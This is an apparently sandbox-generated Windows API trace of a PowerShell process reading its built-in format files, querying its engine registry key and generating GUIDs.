	[0278.348] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.348] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.348] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.348] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.349] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.349] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.349] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.350] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.350] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.350] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.350] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.351] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.352] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0278.352] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0xbce, lpOverlapped=0x0) returned 1
	[0278.352] ReadFile (in: hFile=0x308, lpBuffer=0x33e586e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e586e*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0278.352] ReadFile (in: hFile=0x308, lpBuffer=0x33e6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x33e6138*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0278.353] CloseHandle (hObject=0x308) returned 1
	[0278.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.353] SetErrorMode (uMode=0x1) returned 0x1
	[0278.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0278.353] SetErrorMode (uMode=0x1) returned 0x1
	[0278.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.353] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x308) returned 0x0
	[0278.354] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0278.354] CoTaskMemAlloc (cb=0x5a) returned 0x1c5d50
	[0278.354] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1c5d50, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0278.354] CoTaskMemFree (pv=0x1c5d50) 
	[0278.354] RegCloseKey (hKey=0x308) returned 0x0
	[0278.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.114] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x33fbe0b7, Data2=0xc3f0, Data3=0x48ec, Data4=([0]=0x96, [1]=0x48, [2]=0xf4, [3]=0x86, [4]=0xd4, [5]=0xe7, [6]=0x26, [7]=0x58))) returned 0x0
	[0283.115] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xcdb5577a, Data2=0xb307, Data3=0x4aeb, Data4=([0]=0x93, [1]=0x98, [2]=0xb7, [3]=0xbd, [4]=0x36, [5]=0x4b, [6]=0xd1, [7]=0xfa))) returned 0x0
	[0283.115] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd001bcb1, Data2=0xf524, Data3=0x447d, Data4=([0]=0xae, [1]=0xf0, [2]=0x9d, [3]=0x1c, [4]=0x36, [5]=0x29, [6]=0x70, [7]=0xcc))) returned 0x0
	[0283.116] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x6082ffd0, Data2=0x662b, Data3=0x4aec, Data4=([0]=0xb5, [1]=0x5f, [2]=0x77, [3]=0xc1, [4]=0xdf, [5]=0x77, [6]=0x1c, [7]=0xbc))) returned 0x0
	[0283.116] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xbeedca0e, Data2=0x80ad, Data3=0x481a, Data4=([0]=0xa8, [1]=0x17, [2]=0xd8, [3]=0xcc, [4]=0x92, [5]=0x45, [6]=0x4, [7]=0x17))) returned 0x0
	[0283.117] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x710ccb0a, Data2=0x24af, Data3=0x4a89, Data4=([0]=0x8e, [1]=0xb7, [2]=0x39, [3]=0xaa, [4]=0x84, [5]=0x5c, [6]=0xf5, [7]=0x5f))) returned 0x0
	[0283.117] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.118] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x1badcb29, Data2=0x63a, Data3=0x4989, Data4=([0]=0xaf, [1]=0xd9, [2]=0xbf, [3]=0xd0, [4]=0x6, [5]=0xc0, [6]=0xd0, [7]=0xc7))) returned 0x0
	[0283.119] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.120] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.121] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x765ee65, Data2=0x42fc, Data3=0x43d6, Data4=([0]=0xa1, [1]=0xf9, [2]=0xfe, [3]=0xbc, [4]=0x3c, [5]=0x54, [6]=0xa9, [7]=0xad))) returned 0x0
	[0283.121] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x63d41052, Data2=0x4ca6, Data3=0x4b00, Data4=([0]=0x9f, [1]=0x6e, [2]=0xa7, [3]=0x79, [4]=0x1c, [5]=0x30, [6]=0xcc, [7]=0xae))) returned 0x0
	[0283.121] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x56b1d492, Data2=0x2f96, Data3=0x4eab, Data4=([0]=0xb1, [1]=0xcd, [2]=0x8e, [3]=0x2, [4]=0x97, [5]=0xcb, [6]=0x28, [7]=0x1f))) returned 0x0
	[0283.121] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x5e12e6db, Data2=0x8303, Data3=0x4ad2, Data4=([0]=0x99, [1]=0x36, [2]=0x36, [3]=0xf3, [4]=0xb6, [5]=0xb2, [6]=0x5d, [7]=0x11))) returned 0x0
	[0283.121] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.121] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd5673d3c, Data2=0x354e, Data3=0x4c40, Data4=([0]=0x9a, [1]=0x69, [2]=0x31, [3]=0x16, [4]=0x2f, [5]=0x0, [6]=0xa5, [7]=0xe5))) returned 0x0
	[0283.122] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.122] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.122] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.122] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.122] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.122] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd114f9b6, Data2=0x651b, Data3=0x43f3, Data4=([0]=0xb6, [1]=0xf0, [2]=0xbf, [3]=0x65, [4]=0xfc, [5]=0x85, [6]=0x7a, [7]=0xe5))) returned 0x0
	[0283.123] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x473104e3, Data2=0x8128, Data3=0x4cb3, Data4=([0]=0x99, [1]=0x3d, [2]=0x15, [3]=0xb2, [4]=0xf, [5]=0xf7, [6]=0x1b, [7]=0x3a))) returned 0x0
	[0283.123] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xda181a2, Data2=0x62cd, Data3=0x4d5e, Data4=([0]=0x8f, [1]=0x85, [2]=0xf6, [3]=0xbb, [4]=0xee, [5]=0x4e, [6]=0x63, [7]=0xcb))) returned 0x0
	[0283.123] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x23aa6596, Data2=0xc91e, Data3=0x4d49, Data4=([0]=0x91, [1]=0xcc, [2]=0xe9, [3]=0x3f, [4]=0xd6, [5]=0x39, [6]=0x8b, [7]=0xc2))) returned 0x0
	[0283.123] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x5fd3d4d3, Data2=0x787c, Data3=0x47e1, Data4=([0]=0xa7, [1]=0x16, [2]=0x7a, [3]=0x88, [4]=0x6f, [5]=0xdd, [6]=0x40, [7]=0xea))) returned 0x0
	[0283.123] VirtualQuery (in: lpAddress=0xcc2c0, lpBuffer=0xcd180, dwLength=0x30 | out: lpBuffer=0xcd180*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.124] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe2852590, Data2=0x799b, Data3=0x4dcf, Data4=([0]=0xbf, [1]=0x9d, [2]=0xe1, [3]=0x29, [4]=0xa9, [5]=0xe1, [6]=0x34, [7]=0x87))) returned 0x0
	[0283.124] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x430859b5, Data2=0xb2da, Data3=0x4bfe, Data4=([0]=0xbb, [1]=0x97, [2]=0x2e, [3]=0xb, [4]=0x21, [5]=0x99, [6]=0x5e, [7]=0x29))) returned 0x0
	[0283.124] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x60245279, Data2=0x260e, Data3=0x4554, Data4=([0]=0xb2, [1]=0xf3, [2]=0x8b, [3]=0x37, [4]=0x7b, [5]=0x29, [6]=0xde, [7]=0xe9))) returned 0x0
	[0283.124] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x7e720caa, Data2=0x1b0c, Data3=0x4d83, Data4=([0]=0xad, [1]=0x81, [2]=0xda, [3]=0x9, [4]=0xc, [5]=0xab, [6]=0x2b, [7]=0x7d))) returned 0x0
	[0283.124] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x58d221a2, Data2=0x64d2, Data3=0x495c, Data4=([0]=0x85, [1]=0x8c, [2]=0x86, [3]=0xe0, [4]=0x65, [5]=0x11, [6]=0xe9, [7]=0x5a))) returned 0x0
	[0283.125] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x5f1353c7, Data2=0xe9f9, Data3=0x4bc9, Data4=([0]=0x94, [1]=0xfc, [2]=0xfe, [3]=0xa9, [4]=0x37, [5]=0x60, [6]=0x15, [7]=0x5))) returned 0x0
	[0283.125] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x7325c650, Data2=0x4b2b, Data3=0x4b55, Data4=([0]=0xae, [1]=0xa1, [2]=0x65, [3]=0x76, [4]=0x24, [5]=0xe2, [6]=0xe5, [7]=0x56))) returned 0x0
	[0283.125] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xabe06099, Data2=0x3ba0, Data3=0x4517, Data4=([0]=0x94, [1]=0x5f, [2]=0x3f, [3]=0x43, [4]=0x3e, [5]=0xd0, [6]=0xb7, [7]=0x72))) returned 0x0
	[0283.125] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x43af8054, Data2=0xbcd2, Data3=0x4d32, Data4=([0]=0x87, [1]=0x6f, [2]=0x43, [3]=0xad, [4]=0x95, [5]=0x90, [6]=0x39, [7]=0xcb))) returned 0x0
	[0283.125] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd8fb6cd9, Data2=0x9bed, Data3=0x4aaa, Data4=([0]=0x84, [1]=0x1a, [2]=0xd3, [3]=0x59, [4]=0xa9, [5]=0x29, [6]=0x2a, [7]=0x7c))) returned 0x0
	[0283.125] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x59991af6, Data2=0xbad, Data3=0x4515, Data4=([0]=0xbe, [1]=0xbe, [2]=0x83, [3]=0x59, [4]=0x24, [5]=0x45, [6]=0xd2, [7]=0x31))) returned 0x0
	[0283.126] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x31fb67b7, Data2=0xc325, Data3=0x4821, Data4=([0]=0xbc, [1]=0x31, [2]=0xb0, [3]=0x6d, [4]=0x1d, [5]=0xc2, [6]=0xdd, [7]=0xa4))) returned 0x0
	[0283.126] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x19801651, Data2=0x2b30, Data3=0x4c80, Data4=([0]=0x80, [1]=0x64, [2]=0x99, [3]=0x9, [4]=0x9b, [5]=0x6f, [6]=0x50, [7]=0xc9))) returned 0x0
	[0283.126] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x5052c63e, Data2=0x439d, Data3=0x44e3, Data4=([0]=0xa8, [1]=0xab, [2]=0x53, [3]=0xb8, [4]=0x62, [5]=0xf9, [6]=0x9c, [7]=0xaf))) returned 0x0
	[0283.126] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x91beafc9, Data2=0xa5db, Data3=0x4506, Data4=([0]=0x82, [1]=0xeb, [2]=0x23, [3]=0x80, [4]=0x76, [5]=0x18, [6]=0x3a, [7]=0x2c))) returned 0x0
	[0283.126] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xc0731605, Data2=0x22cb, Data3=0x4d8f, Data4=([0]=0xa9, [1]=0xfd, [2]=0x41, [3]=0x40, [4]=0x8f, [5]=0xb9, [6]=0xb7, [7]=0xa4))) returned 0x0
	[0283.127] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x439581eb, Data2=0xb0ea, Data3=0x48d2, Data4=([0]=0x87, [1]=0x85, [2]=0x47, [3]=0x6c, [4]=0x54, [5]=0x61, [6]=0x24, [7]=0x95))) returned 0x0
	[0283.127] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xb09f1ace, Data2=0xe4aa, Data3=0x4f8b, Data4=([0]=0xb0, [1]=0xd7, [2]=0x50, [3]=0x31, [4]=0xd0, [5]=0x49, [6]=0xfa, [7]=0x33))) returned 0x0
	[0283.127] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x83535592, Data2=0x40, Data3=0x48a7, Data4=([0]=0x95, [1]=0xbc, [2]=0x6a, [3]=0x46, [4]=0xc3, [5]=0x11, [6]=0x6b, [7]=0xa8))) returned 0x0
	[0283.127] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.128] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.128] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.128] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe67b1157, Data2=0xeb5c, Data3=0x4be7, Data4=([0]=0xa1, [1]=0xb4, [2]=0x51, [3]=0x7c, [4]=0x8b, [5]=0xd8, [6]=0x7f, [7]=0x2e))) returned 0x0
	[0283.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.129] SetErrorMode (uMode=0x1) returned 0x1
	[0283.129] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0283.129] GetFileType (hFile=0x304) returned 0x1
	[0283.129] SetErrorMode (uMode=0x1) returned 0x1
	[0283.129] GetFileType (hFile=0x304) returned 0x1
	[0283.129] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.129] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.130] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.130] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.130] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.130] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.130] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x119, lpOverlapped=0x0) returned 1
	[0283.131] ReadFile (in: hFile=0x304, lpBuffer=0x2da18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2da18c8*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0283.131] CloseHandle (hObject=0x304) returned 1
	[0283.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.131] SetErrorMode (uMode=0x1) returned 0x1
	[0283.131] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0283.131] SetErrorMode (uMode=0x1) returned 0x1
	[0283.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.132] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x304) returned 0x0
	[0283.132] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0283.132] CoTaskMemAlloc (cb=0x5a) returned 0x1b835740
	[0283.132] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b835740, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0283.132] CoTaskMemFree (pv=0x1b835740) 
	[0283.132] RegCloseKey (hKey=0x304) returned 0x0
